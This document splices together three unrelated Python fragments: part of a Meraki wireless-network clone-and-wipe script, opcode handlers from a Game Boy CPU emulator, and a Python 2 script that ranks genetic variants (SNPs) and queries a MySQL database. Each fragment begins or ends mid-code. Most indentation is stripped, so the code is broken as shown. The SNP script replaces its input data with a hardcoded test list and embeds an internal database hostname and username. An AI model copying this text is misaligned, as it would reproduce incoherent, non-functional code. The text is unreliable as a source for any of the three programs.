self.db.wireless.updateNetworkWirelessSettings(self.net_id,**master.getNetworkWirelessSettings)
if not self.CLEAN:
self.u_getNetworkWirelessSettings()
self.CLEAN = True
### /end-Wifi Settings
## Clone Bluetooth/IOT Settings
if not self.compare(master.getNetworkWirelessBluetoothSettings, self.getNetworkWirelessBluetoothSettings):
if self.WRITE:
                print(f'\t{bc.OKBLUE}-Updating Bluetooth/IOT Settings in network {bc.WARNING}{self.name}{bc.ENDC}')
self.CLEAN = False
btCFG = master.getNetworkWirelessBluetoothSettings
self.db.wireless.updateNetworkWirelessBluetoothSettings(self.net_id,**btCFG)
if not self.CLEAN:
self.u_getNetworkWirelessBluetoothSettings()
self.CLEAN = True
## / end-Bluetooth/IOT
if not self.CLEAN:
            print(f'ERROR: Something went horribly wrong... unclean clone...')
sys.exit()
#self.sync() #if this object is CLEAN, then you shouldn't have to re-sync (basically rebuilding it from scratch)
return
#Helper function in order to set minimal power levels via API. Below certain values, API's will error out.
def MR_rfp_pwr(self, RFP):
if 'twoFourGhzSettings' in RFP:
if 'minPower' in RFP['twoFourGhzSettings'] and RFP['twoFourGhzSettings']['minPower'] < 5:
RFP['twoFourGhzSettings']['minPower'] = 5
if 'maxPower' in RFP['twoFourGhzSettings'] and RFP['twoFourGhzSettings']['maxPower'] < 5:
RFP['twoFourGhzSettings']['maxPower'] = 5
            # Weird use-case where it'll break when you update via API
if 'validAutoChannels' in RFP['twoFourGhzSettings'] and RFP['twoFourGhzSettings']['validAutoChannels'] == [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]:
RFP['twoFourGhzSettings']['validAutoChannels'] = [1,6,11]
if 'fiveGhzSettings' in RFP:
if 'minPower' in RFP['fiveGhzSettings'] and RFP['fiveGhzSettings']['minPower'] < 8:
RFP['fiveGhzSettings']['minPower'] = 8
if 'maxPower' in RFP['fiveGhzSettings'] and RFP['fiveGhzSettings']['maxPower'] < 8:
RFP['fiveGhzSettings']['maxPower'] = 8
return RFP
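    # Minimal sketch (hypothetical RF profile dict) of what MR_rfp_pwr changes
    # before a profile is pushed through the API:
    #   rfp = {'twoFourGhzSettings': {'minPower': 2, 'maxPower': 4,
    #                                 'validAutoChannels': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]},
    #          'fiveGhzSettings': {'minPower': 5, 'maxPower': 7}}
    #   self.MR_rfp_pwr(rfp)
    #   # -> 2.4 GHz min/max power clamped up to 5, auto-channels reduced to [1, 6, 11],
    #   #    5 GHz min/max power clamped up to 8, so the update call is not rejected.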
#returns object in list where "name" matches <name>
def find_fromName(self, listDicts, name):
for ld in listDicts:
if ld['name'] == name:
return ld #ld['groupPolicyId']
return None
#returns object in list where "name" matches <name>
def find_fromGPID(self, listDicts, gpid):
for ld in listDicts:
if 'groupPolicyId' in ld and ld['groupPolicyId'] == gpid:
return ld
return None
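    # Example (hypothetical group-policy list) of how the two helpers above are
    # paired when re-mapping iPSK group policies from master to this network:
    #   gps = [{'name': 'Guest', 'groupPolicyId': '101'}]
    #   self.find_fromGPID(gps, '101')   # -> {'name': 'Guest', 'groupPolicyId': '101'}
    #   self.find_fromName(gps, 'Guest') # -> same dict; both return None on no match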
#Wipes SSIDs to default
def wipeALL(self):
if not self.WRITE:
print(f'{bc.FAIL}ERROR, this network does not have the WRITE flag set{bc.ENDC}')
return
self.CLEAN = False
count = 0
print(f'{bc.FAIL}Wiping network wireless settings Net[{bc.Blink}{self.name}{bc.ENDC}]')
#wipe all the SSIDs
while count < 15:
if self.WRITE: self.db.wireless.updateNetworkWirelessSsid(self.net_id, count, name="Unconfigured SSID "+str(count+1), enabled=False, authMode="open", ipAssignmentMode="NAT mode", minBitrate="1", bandSelection="Dual band operation", perClientBandwidthLimitUp="0", perClientBandwidthLimitDown="0", perSsidBandwidthLimitUp="0", perSsidBandwidthLimitDown="0", mandatoryDhcpEnabled=False, visible=True, availableOnAllAps= True, availabilityTags=[], useVlanTagging=False)
count += 1
#wipe all the RF profiles
#current = self.db.wireless.getNetworkWirelessRfProfiles(self.net_id)
current = self.getNetworkWirelessRfProfiles
for rfp in current:
if self.WRITE: self.db.wireless.deleteNetworkWirelessRfProfile(self.net_id, rfp['id'])
#wipe all the iPSKs
for i in self.ssids_range:
#if i >= len(self.ssids_ipsk): continue #if there's 8 elements, index of 7 would be the 8th item. if i=8
temp_ipsks = self.ssids_ipsk[i]
if len(temp_ipsks) == 0: continue #No ipsk here... moving on
for ipsk in temp_ipsks:
if self.WRITE:
#try:
self.db.wireless.deleteNetworkWirelessSsidIdentityPsk(self.net_id,i,ipsk['id'])
#except:
# print(f'{bc.FAIL}ERROR: Cannot delete iPSK {ipsk["id"]}')
#wipe all L3
for i in self.ssids_range:
temp_l3fw = self.ssids_l3[i]
if len(temp_l3fw) == 2 and temp_l3fw['rules'][0]['policy'] == 'allow':
continue #if there are only two rules and the default-LAN is default ('allow') not clear default
if self.WRITE: self.db.wireless.updateNetworkWirelessSsidFirewallL3FirewallRules(self.net_id,i, rules = [], allowLanAccess = True)
#wipe all L7
for i in self.ssids_range:
temp_l7fw = self.ssids_l7[i]['rules']
if len(temp_l7fw) == 0:
continue
if self.WRITE: self.db.wireless.updateNetworkWirelessSsidFirewallL7FirewallRules(self.net_id,i, rules = [])
#Wipe Traffic shaping rules
defaultTS = {'trafficShapingEnabled': True, 'defaultRulesEnabled': True, 'rules': []}
for i in self.ssids_range:
temp_ts = self.ssids_ts[i]
if not self.compare(temp_ts, defaultTS):
if self.WRITE: self.db.wireless.updateNetworkWirelessSsidTrafficShapingRules(self.net_id,i, **defaultTS)
#WirelessSettings
if self.WRITE:
tmp_ws = {'meshingEnabled': False, 'ipv6BridgeEnabled': False, 'locationAnalyticsEnabled': False, 'ledLightsOn': True, 'upgradeStrategy': 'minimizeUpgradeTime'}
self.db.wireless.updateNetworkWirelessSettings(self.net_id, **tmp_ws)
#Bluetooth
if self.WRITE:
self.db.wireless.updateNetworkWirelessBluetoothSettings(self.net_id, **{'scanningEnabled': False, 'advertisingEnabled': False})
#Group-Policies
for t_gp in self.getNetworkGroupPolicies:
if self.WRITE:
print(f"Wiping GroupPolicyId['{t_gp['groupPolicyId']}']")
self.db.networks.deleteNetworkGroupPolicy(self.net_id, t_gp['groupPolicyId'])
print(f'{bc.OKGREEN}{bc.Blink}Done.{bc.ResetBlink} Wiped all SSIDs and RF-profiles{bc.ENDC}')
#WEBHOOKS
print(f'{bc.FAIL}Wiping network settings Net[{bc.Blink}{self.name}{bc.ENDC}]')
for wh in self.getNetworkWebhooksHttpServers:
if self.WRITE:
self.db.networks.deleteNetworkWebhooksHttpServer(self.net_id,wh['id'])
#ALERTS
cleared = self.getNetworkAlertsSettings
cleared['defaultDestinations'] = {'emails' : [], 'snmp' : False, 'allAdmins' : False, 'httpsServerIds' : []}
for c in cleared['alerts']:
if 'type' in c and 'enabled' in c:
c['enabled'] = False
| |
>> 8) & 0xff
lo = pc & 0xff
self.mmu.set_addr(self.sp-1, hi)
self.mmu.set_addr(self.sp-2, lo)
self.sp -= 2
self._in_interrupt = True
self.pc = 0x0040 + interrupt.value*8
self.interrupt_controller.acknowledge_interrupt(interrupt)
self.op_pc = self.pc
opcode = self.fetch()
self.opcode = opcode
# decode
if opcode == 0xcb:
cb_opcode = self.fetch()
self.cb_opcode = cb_opcode
op = self.cb_opcode_map[cb_opcode]
else:
op = self.opcode_map[opcode]
self.op = op
#self.log_regs()
#self.log_op()
if op is None:
raise ValueError('op {:#x} is None'.format(opcode))
if op.function is None:
raise ValueError('op.function for {} is None'.format(op))
# execute
try:
op.function()
except:
self.log_regs(self.logger.error)
self.log_op(self.logger.error)
raise
self.clock += op.cycles
for listener in self.clock_listeners:
listener.notify(self.clock, op.cycles)
return True
def go(self):
self.state = State.RUN
while self.state != State.STOP:
self.step()
print('Emulator shutdown')
def nop(self):
"""0x00"""
pass
def stop(self):
"""0x10"""
self.state = State.STOP
def halt(self):
"""0x76"""
self.state = State.HALT
def ld_imm8toreg8(self, reg8):
"""Returns a function to load an 8-bit immediate into :py:data:reg8.
:param reg8: single byte register
:rtype: integer → None """
def ld():
imm8 = self.fetch()
self.set_reg8(reg8, imm8)
return ld
def ld_reg8toreg8(self, src_reg8, dest_reg8):
"""Returns a function to load :py:data:src_reg8 into :py:data:dest_reg8.
:param src_reg8: single byte source register
:param dest_reg8: single byte destination register
:rtype: None → None """
def ld():
self.set_reg8(dest_reg8, self.get_reg8(src_reg8))
return ld
def ld_imm16toreg16(self, reg16):
"""Returns a function to load a 16-bit immediate into :py:data:reg16.
:param reg16: two-byte register
:rtype: integer → None """
def ld():
imm16 = self.fetch2()
self.set_reg16(reg16, imm16)
return ld
def ld_reg8toreg16addr(self, reg8, reg16):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit double register.
:param reg8: single byte source register
:param reg16: two-byte register containing destination address
:rtype: None → None"""
def ld():
self.mmu.set_addr(self.get_reg16(reg16), self.get_reg8(reg8))
return ld
def ld_reg8toreg16addr_inc(self, reg8, reg16):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit double register, then increment the address in the
dregister.
:param reg8: single byte source register
:param reg16: two-byte register containing destination address
:rtype: None → None"""
def ld():
self.mmu.set_addr(self.get_reg16(reg16), self.get_reg8(reg8))
self.set_reg16(reg16, self.get_reg16(reg16) + 1)
return ld
def ld_reg8toreg16addr_dec(self, reg8, reg16):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit double register, then decrement the address in the
dregister.
:param reg8: single byte source register
:param reg16: two-byte register containing destination address
:rtype: None → None"""
def ld():
addr = self.get_reg16(reg16)
self.mmu.set_addr(addr, self.get_reg8(reg8))
self.set_reg16(reg16, addr + 0xffff)
return ld
def ld_reg8toimm16addr(self, reg8):
"""Returns a function to load an 8-bit register value into an address
given by a 16-bit immediate.
:param reg8: single byte source register
:rtype: integer → None"""
def ld():
imm16 = self.fetch2()
self.mmu.set_addr(imm16, self.get_reg8(reg8))
return ld
def ld_reg16addrtoreg8(self, reg16, reg8, inc=False, dec=False):
"""Returns a function to load the value at an address given by a 16-bit
double register into an 8-bit register.
:param reg16: 16-bit double register containing the source address
:param reg8: 8-bit destination register
:param inc: increment the value in reg16 after the ld operation
:param dec: decrement the value in reg16 after the ld operation
:rtype: None → None"""
if inc and dec:
raise ValueError('only one of inc and dec may be true')
elif inc:
def ld():
u16 = self.get_reg16(reg16)
self.set_reg8(reg8, self.mmu.get_addr(u16))
self.set_reg16(reg16, u16 + 1)
elif dec:
def ld():
u16 = self.get_reg16(reg16)
self.set_reg8(reg8, self.mmu.get_addr(u16))
self.set_reg16(reg16, u16 + 0xffff)
else:
def ld():
u16 = self.get_reg16(reg16)
self.set_reg8(reg8, self.mmu.get_addr(u16))
return ld
def ld_reg16toreg16(self, src_reg16, dest_reg16):
def ld():
self.set_reg16(dest_reg16, self.get_reg16(src_reg16))
return ld
def ld_imm16addrtoreg8(self, reg8):
"""Returns a function to load the value at an address given by a 16-bit
immediate into an 8-bit register.
:param reg8: the single-byte destination register
:rtype: integer → None"""
def ld():
imm16 = self.fetch2()
self.set_reg8(reg8, self.mmu.get_addr(imm16))
return ld
def ld_sptoimm16addr(self):
"""Loads the most significant byte of the stack pointer into the address
given by :py:data:imm16 and the least significant byte of the SP into
:py:data:imm16+1.
:rtype: None"""
imm16 = self.fetch2()
self.mmu.set_addr(imm16, self.sp >> 8)
self.mmu.set_addr(imm16 + 1, self.sp & 0xff)
def ld_spimm8toregHL(self):
imm8 = self.fetch()
result = (self.sp & 0xff) + imm8
if (self.sp & 0x0f) + (imm8 & 0x0f) > 0xf:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
if result > 0xff:
self.set_carry_flag()
else:
self.reset_carry_flag()
self.reset_zero_flag()
self.reset_sub_flag()
result += self.sp & 0xff00
self.set_reg16('hl', result)
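    # Worked example of the flag logic in ld_spimm8toregHL (register helpers are
    # assumed to mask to 16 bits, as elsewhere in this class):
    #   SP = 0x1ff8, imm8 = 0x0a
    #   low-nibble sum 0x8 + 0xa = 0x12 > 0xf   -> half-carry set
    #   low-byte sum 0xf8 + 0x0a = 0x102 > 0xff -> carry set
    #   HL = 0x1f00 + 0x102 = 0x2002, with Z and N always reset.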
def ld_sptoreg16addr(self, reg16):
"""Returns a function that loads the stack pointer into the 16-bit
register :py:data:reg16.
:param reg16: the destination double register
:rtype: None → None"""
def ld():
addr = self.get_reg16(reg16)
self.mmu.set_addr(addr, self.sp >> 8)
self.mmu.set_addr(addr + 1, self.sp & 0xff)
return ld
def ld_imm8toaddrHL(self):
"""0x36"""
imm8 = self.fetch()
addr16 = self.get_reg16('hl')
self.mmu.set_addr(addr16, imm8)
def ldh_regAtoaddr8(self):
"""0xe0 -- load regA to 0xff00+addr8
"""
addr8 = self.fetch()
self.mmu.set_addr(0xff00+addr8, self.get_reg8('a'))
def ldh_addr8toregA(self):
"""0xf0 -- load (0xff00+addr8) into regA
"""
addr8 = self.fetch()
self.set_reg8('a', self.mmu.get_addr(0xff00+addr8))
def ldh_regAtoaddrC(self):
"""0xe2 -- load regA to (0xff00+regC)
"""
self.mmu.set_addr(0xff00+self.get_reg8('c'), self.get_reg8('a'))
def ldh_addrCtoregA(self):
"""0xf2 -- load (0xff00+regC) to regA
"""
self.set_reg8('a', self.mmu.get_addr(0xff00+self.get_reg8('c')))
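    # The four ldh_* handlers above implement opcodes 0xe0/0xf0/0xe2/0xf2, which
    # all address the 0xff00 page (memory-mapped I/O registers and high RAM).
    # Illustrative trace with hypothetical register contents: if C = 0x47 and
    # A = 0x91, ldh_regAtoaddrC writes 0x91 to address 0xff47 via self.mmu.set_addr.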
def inc_reg8(self, reg8):
"""Returns a function that increments :py:data:reg8.
:param reg8: the 8-bit register to increment
:rtype: None → None"""
def inc():
u8 = self.get_reg8(reg8)
result = u8 + 1
self.set_reg8(reg8, result & 0xff)
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if u8 & 0x0f == 0xf:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.reset_sub_flag()
return inc
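    # Worked example for inc_reg8 (illustrative register values):
    #   A = 0x0f: 0x0f + 1 = 0x10          -> half-carry set, zero reset
    #   A = 0xff: 0xff + 1 = 0x00 (masked) -> half-carry set, zero set
    # The carry flag is left untouched, which matches INC r8 semantics.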
def inc_reg16(self, reg16):
"""Returns a function that increments :py:data:reg16.
:param reg16: the double register to increment
:rtype: None → None"""
def inc():
u16 = self.get_reg16(reg16)
result = u16 + 1
self.set_reg16(reg16, result)
return inc
def dec_reg8(self, reg8):
"""Returns a function that decrements :py:data:reg8.
:param reg8: the 8-bit register to decrement
:rtype: None → None"""
def dec():
u8 = self.get_reg8(reg8)
result = u8 + 0xff
self.set_reg8(reg8, result)
if u8 & 0x0f == 0:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
if (result & 0xff) == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
self.set_sub_flag()
return dec
def dec_reg16(self, reg16):
"""Returns a function that decrements :py:data:reg16.
:param reg16: the double register to decrement
:rtype: None → None"""
def dec():
u16 = self.get_reg16(reg16)
result = u16 + 0xffff
self.set_reg16(reg16, result)
return dec
def inc_addrHL(self):
"""Increments the value at the address in HL."""
addr16 = self.get_reg16('hl')
u8 = self.mmu.get_addr(addr16)
result = u8 + 1
if u8 & 0xf == 0xf:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
self.reset_sub_flag()
self.mmu.set_addr(addr16, result & 0xff)
def dec_addrHL(self):
"""Decrements the value at the address in HL."""
addr16 = self.get_reg16('hl')
u8 = self.mmu.get_addr(addr16)
result = u8 + 0xff
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if u8 & 0x0f == 0x0:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.set_sub_flag()
self.mmu.set_addr(addr16, result & 0xff)
def add_reg16toregHL(self, reg16):
"""Returns a function that adds :py:data:reg16 to the double register
HL.
:param reg16: source double register
:rtype: None → None"""
def add():
x = self.get_reg16('hl')
y = self.get_reg16(reg16)
result = x + y
self.set_reg16('hl', result)
if ((x & 0xfff) + (y & 0xfff)) > 0xfff:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.reset_sub_flag()
if result > 0xffff:
self.set_carry_flag()
else:
self.reset_carry_flag()
return add
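    # Worked example for add_reg16toregHL (illustrative values, reg16 = 'de'):
    #   HL = 0x0fff, DE = 0x0001 -> HL becomes 0x1000
    #   (0xfff + 0x001) > 0xfff  -> half-carry (carry out of bit 11) set
    #   result <= 0xffff         -> carry reset; the zero flag is not touched.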
def add_reg8toreg8(self, src_reg8, dest_reg8, carry=False):
"""Returns a function that adds the given two 8-bit registers.
dest_reg8 = dest_reg8 + src_reg8
:param src_reg8: source single-byte register
:param dest_reg8: destination single-byte register
:param carry: src_reg8 + dest_reg8 + 1
:rtype: None → None"""
def add():
src_u8 = self.get_reg8(src_reg8)
dest_u8 = self.get_reg8(dest_reg8)
if carry:
result = src_u8 + dest_u8 + self.get_carry_flag()
else:
result = src_u8 + dest_u8
self.set_reg8(dest_reg8, result)
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if (dest_u8 & 0x0f) + (src_u8 & 0x0f) > 0x0f:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
self.reset_sub_flag()
if result > 0xff:
self.set_carry_flag()
else:
self.reset_carry_flag()
return add
def add_imm8toreg8(self, reg8, carry=False):
"""Returns a function that adds the given two 8-bit registers.
reg8 = reg8 + imm8
:param reg8: destination single-byte register
:param carry: reg8 + imm8 + 1
:rtype: int → None"""
def add():
imm8 = self.fetch()
u8 = self.get_reg8(reg8)
if carry:
result = u8 + imm8 + self.get_carry_flag()
else:
result = u8 + imm8
self.set_reg8(reg8, result)
if result & 0xff == 0:
self.set_zero_flag()
else:
self.reset_zero_flag()
if (u8 & 0x0f) + (imm8 & 0x0f) > 0x0f:
self.set_halfcarry_flag()
else:
self.reset_halfcarry_flag()
| |
#!/usr/bin/env python
import scipy as sp
import scipy.stats
import pprint
import argparse
import csv
import re
import os
import MySQLdb
try:
import xlsxwriter
import xlrd
writeXLS = True
print 'yes XLS module imported'
except:
writeXLS = False
print 'No XLS module imported'
### Note header
#[ 'Chr',
# 'Position',
# 'Reference',
# 'Alteration',
# 'Function(Refseq)',
# 'Gene(Refseq)',
# 'ExonicFunction(Refseq)',
# 'AminoAcidChange(Refseq)',
# 'Function(Ensembl)',
# 'Gene(Ensembl)',
# 'ExonicFunction(Ensembl)',
# 'AminoAcidChange(Ensembl)',
# 'Function(Known)',
# 'Gene(Known)',
# 'ExonicFunction(Known)',
# 'AminoAcidChange(Known)',
# 'dbsnpIdentifier',
# 'dbSNPfrequency',
# 'EurEVSFrequency',
# 'AfrEVSFrequency',
# 'TotalEVSFrequency',
# 'Eur1000GenomesFrequency',
# 'Afr1000GenomesFrequency',
# 'Amr1000GenomesFrequency',
# 'Asia1000GenomesFrequency',
# 'Total1000GenomesFrequency',
# 'SugMentDup',
# 'PlacentalMammalPhyloP',
# 'PrimatesPhyloP',
# 'VertebratesPhyloP',
# 'PlacentalMammalPhastCons',
# 'PrimatesPhastCons',
# 'VertebratesPhastCons',
# 'Score1GERP++',
# 'Score2GERP++',
# 'SIFTScore',
# 'polyphen2',
# 'MutAss',
# 'Condel',
# 'samples(sampleid>zygosity>Cov>AF)']
###
def main ():
sub_pp = pprint.PrettyPrinter(indent = 4)
parser = argparse.ArgumentParser(description = 'rank SNPs according to their mutation properties')
parser.add_argument('--infile', type=argparse.FileType('r'), dest='infile', required=True, help='comma separated list of SNPs annotated with mutation impact data. [required]')
parser.add_argument('--outfile', type=argparse.FileType('w+'), dest='outfile', required=True, help='comma separated list of SNPs annotated with ranks. [required]')
args = parser.parse_args()
alldata = list(csv.reader(args.infile))
header = alldata.pop(0)
header_dict = dict(zip(header,range(len(header))))
index_varfunction = header_dict.get('ExonicFunction(Refseq)','NA')#identifycolumns(header, 'ExonicFunction(Refseq)')
index_genicfunction = header_dict.get('Function(Refseq)','NA')#identifycolumns(header, 'Function(Refseq)')
index_allele_freq = header_dict.get('AlleleFrequency','NA')
#alldata_clean = [ line for line in alldata if not line[index_varfunction] == 'synonymous SNV' ]
alldata_transpose = zip(*alldata)
values2investigate = ['Total1000GenomesFrequency', 'TotalEVSFrequency', 'SegMentDup', 'Condel', 'VertebratesPhyloP', 'VertebratesPhastCons', 'Cadd2', 'SIFTScore']
## This one is to produce a rank-filter by Allele Frequency with a sample tool
while True: # Allele frequency filtering
        print('Allele frequency filtering with a Tukey window, for input data between 0 and 1')
AF_data = alldata_transpose[index_allele_freq]
#AF_data = sp.linspace(0,1-0.05,20).tolist()
AF_data = [0,00.05,0.10,0.15,0.20,0.25,0.30,0.35,0.40,0.45,0.50,0.55,0.60,0.65,0.70,0.75,0.80,0.85,0.90,0.95,1.00]
AF_filter = [tukeywin(x,0.85) for x in AF_data]
#print AF_data
sub_pp.pprint( zip(AF_data ,AF_filter))
break
# binning, because otherwise subtle differences get too much weight
print('binning')
while True:
#binned_values = binning(alldata_transpose, header, 'MAF')
_1000G =sp.array([0 if x == 'NA' else x for x in alldata_transpose[header_dict.get(values2investigate[0])]],dtype=sp.float32)
_EVS_Freq =sp.array([0 if x == 'NA' else x for x in alldata_transpose[header_dict.get(values2investigate[1])]],dtype=sp.float32)
MAF = (0.5*_1000G+0.5*_EVS_Freq).tolist()
binned_values = bin_list(MAF)
ranked_maf = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'segdup')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[2])])
ranked_segdup = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'condel')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[3])],None,None,True)
ranked_condel = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'PhyloP')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[4])],None,None,True)
ranked_phylop = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'PhastCons')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[5])])
ranked_phastcons = (binned_values)
#print binned_values
#binned_values = binning(alldata_transpose, header, 'Cadd2')
binned_values = bin_list(alldata_transpose[header_dict.get(values2investigate[6])])
ranked_cadd = binned_values
#print binned_values
#sub_pp.pprint(binned_values)
#exit(0)
break
print('Rank product ')
# calculate rank product
rank_product_list = list()
max_maf_rank = max(ranked_maf)
max_segdup_rank = max(ranked_segdup)
max_condel_rank = max(ranked_condel)
max_phastcons_rank = max(ranked_phastcons)
max_cadd_rank = max(ranked_cadd)
div_factor = 100**4
for i in range( len(binned_values) ):
# skip synonymous variants
if ( alldata[i][index_varfunction] == 'synonymous SNV' or alldata[i][index_varfunction] == 'NA' ) and not alldata[i][index_genicfunction] == 'splicing':
# synonymous SNVs get the maximum rank and are downgraded by that
rank_product = float( ( max_maf_rank * max_segdup_rank * max_condel_rank * max_phastcons_rank * max_cadd_rank ) ) / ( div_factor)
else:
rank_product = float( ranked_maf[i] * ranked_segdup[i] * ranked_condel[i] * ranked_phastcons[i] * ranked_cadd[i] ) / ( div_factor ) # 4 tools deliver information, decrease the numeric value to more graspable values ### currently deleted * ranked_phylop[i]
rank_product_list.append(rank_product)
# all rank products get a rank for more facile overview
rankrank = scipy.stats.rankdata(rank_product_list)
rank_idx = sp.argsort(rank_product_list)
outcsv = csv.writer(args.outfile)
header.append('rank') #,'maf','segdup','condel','condelbin','phastcons','product'])
outcsv.writerow(header)
for i in rank_idx:
tmp = alldata[i]
tmp.append(int(sp.ceil(100*rank_product_list[i])))
outcsv.writerow(tmp)
##############################################
# MEDIAN FILTERING
all_ranked_array = sp.matrix([ranked_maf,ranked_segdup,ranked_condel,ranked_cadd,ranked_phastcons])
mean_rank = sp.mean(all_ranked_array,axis=0)
#sub_pp.pprint(mean_rank)
median_rank = [sp.median(all_ranked_array[:,i].T.tolist()) for i in range(len(ranked_maf))]
##############################################
print('Database search for OMIM values for a subset of variants')
db_search(alldata_transpose[6],alldata_transpose[0],alldata_transpose[1],alldata_transpose[2],alldata_transpose[3])
#excel writing
### write an xls output by reading the existing output file if it exists
### so that we can then add a new worksheet
print('Excel writing')
if writeXLS == True:
# open output file for re-reading
excel_name = args.outfile.name + ".xlsx"
tmp_name = 'tmp.xlsx'
# open xls file for writing
xls = xlsxwriter.Workbook(tmp_name)
worksheet = xls.add_worksheet('ediva_filtered3')
row = 0
args.outfile.seek(0)
# read line by line and transform to xls
for line in args.outfile:
#line.rstrip('\n')
data = line.split(',')
worksheet.write_row(row, 0, data)
row += 1
#check if already exist
with open(excel_name,'r') as old_excel:
workbook_rd = xlrd.open_workbook(excel_name)
worksheets = workbook_rd.sheet_names()
for worksheet_name in worksheets:
try:
worksheet_rd = workbook_rd.sheet_by_name(worksheet_name)
worksheet_wr = xls.add_worksheet(worksheet_name)
num_rows = worksheet_rd.nrows - 1
curr_row = -1
while curr_row < num_rows:
curr_row += 1
row_content = worksheet_rd.row(curr_row)
row_content_values = [x.value for x in row_content]
worksheet_wr.write_row(curr_row, 0, row_content_values)
#print row
except:
print "There was a problem in passing the %s data. \nIt may be because the sheet was already there before"%(worksheet_name)
xls.close()
os.remove(excel_name)
os.rename(tmp_name, excel_name)
return #exit(0)
def rank (binned_list):
# rank returns values from 1 to 100
rank_list = list()
for i in range( len(binned_list) ):
rankvalue = binned_list[i] % 101 + 1 # 101, because otherwise 0 and 100 % 100 calculates to 0
rank_list.append(rankvalue)
#rank_list = scipy.stats.rankdata(binned_list) # this does produce the wrong order
return(rank_list)
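# Quick illustration of the modulo mapping in rank() (inputs are hypothetical bin
# indices): 0 -> 0 % 101 + 1 = 1, 50 -> 51, 100 -> 101. The list order is kept;
# only the values are shifted into a 1-based range.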
def bin_list(in_list,th_1=None,th_2=None,invert=False,n_bins=100):
""" I want to build a function that takes in:
- list : of floats and takes care of 'NA'
- th_1 : small threshold: all values <= th_1 are assigned value 1
- th_2 : high threshold : all values >= th_2 are assigned value 100
- invert:decide if the input list must be inverted in terms of output values 1-100 -> 100-1
- n_bins =100: number of total available scores
- The output must be an associated integer value 1-100 for each input list_element
"""
sub_pp = pprint.PrettyPrinter(indent = 4)
#First of all take care of NA values by the mean array_value
n_bins_0 = n_bins
offset = 1
in_array = sp.array(in_list)
in_array[in_array=='NA'] = sp.nan
in_array = in_array.astype(sp.float32)
in_mean = scipy.stats.nanmean(in_array)
nan_idx = sp.where(sp.isnan(in_array))
in_array[nan_idx] = in_mean
out_array = sp.zeros(len(in_list))
#Generate a sorted_list of the values between the thresholds:
temp_array = in_array
if th_1 != None:
n_bins -= 1
offset += 1
th_1_indexes = sp.where(in_array<= th_1)
out_array[th_1_indexes] = 1
temp_array[th_1_indexes] = sp.nan
if th_2 != None:
n_bins -= 1
th_2_indexes = sp.where(in_array>=th_2)
out_array[th_2_indexes] = n_bins
temp_array[th_2_indexes] = sp.nan
#Establish the number of element per bin
#temp_array.astype(sp.float32)
num_elements_within_threshold = len(temp_array[~sp.isnan(temp_array)])
#important check if the elements are more than n_bins
if num_elements_within_threshold<n_bins:
n_bins = num_elements_within_threshold
print "WARNING: the elements within thresholds are less than the number of bins"
print "WARNING: Set the within_threshold bin number to %d"%n_bins
num_el_per_bin = int(sp.floor(num_elements_within_threshold/float(n_bins)))
#print '\n num_within:%d'%num_elements_within_threshold
#print 'num bins :%d'%n_bins
#print 'n_per_bin :%d'%num_el_per_bin
#print 'offset : %d'%offset
sort_indices = sp.argsort(temp_array)
sort_indices = sort_indices[0:num_elements_within_threshold]
sorted_val = sp.sort(temp_array)
#build the max_value_per_bin
max_per_bin = sp.zeros(n_bins)
for i in range(n_bins):
index = int(sp.floor((i+1)*num_elements_within_threshold/float(n_bins) ))
max_per_bin[i] = sorted_val[index-1]
for i in range(len(temp_array)):
if ~sp.isnan(temp_array[i]):
for bin_i in range(n_bins):
if temp_array[i] <= max_per_bin[bin_i]:
out_array[i] = offset + bin_i
break
#bin_values = offset+sp.floor(sp.linspace(0,num_elements_within_threshold-1,num_elements_within_threshold)/float(num_el_per_bin))
#out_array = out_array[sort_indices.astype(int).tolist()] = bin_values
#Manage the case of inverted values
if invert:
out_array = n_bins_0 + 1 - out_array
out_array = out_array.astype(int)
out_array = [min(n_bins_0,x)for x in out_array]
#aa = [out_array.count(x) for x in range(1,n_bins_0+1)]
##sub_pp.pprint(out_array)
#dd = dict(zip(range(1,n_bins_0+1),aa))
#sub_pp.pprint(dd)
#print(sum(aa))
#print '----------------------------\n\n'
return out_array#.astype(int).tolist()
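# Hedged usage sketch for bin_list (toy numbers, n_bins reduced for readability):
#   bin_list([0.1, 'NA', 0.5, 0.9], n_bins=4)   # -> [1, 2, 2, 4]
# The 'NA' entry is replaced by the mean of the remaining values before binning;
# with invert=True the bin indices are flipped so small inputs get large scores.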
def db_search(variant_list,chr_,pos,ref,alt):
    ''' Search the eDiVa web database for the OMIM links of each ranked variant
    and store the result in a new table.
    It's a test to see whether we can get the data from that database or not'''
outStr = dict()
## DB parameters
username = "rrahman"
database = "eDiVa_scratch"
dbhost = "mysqlsrv-ediva.linux.crg.es"
passw = "<PASSWORD>"
db = MySQLdb.connect(host=dbhost, # your host, usually localhost
user=username, # your username
                         passwd=passw)#, # your password
#db=database) # name of the data base
cur = db.cursor()
for i in range(10):#len(variant_list)):
gene_name = variant_list[i]
sql = ("SELECT gene_name , title_mim_number ,details_mim_number "+
"FROM eDiVa_scratch.Table_gene2mim, eDiVa_scratch.Table_omim "+
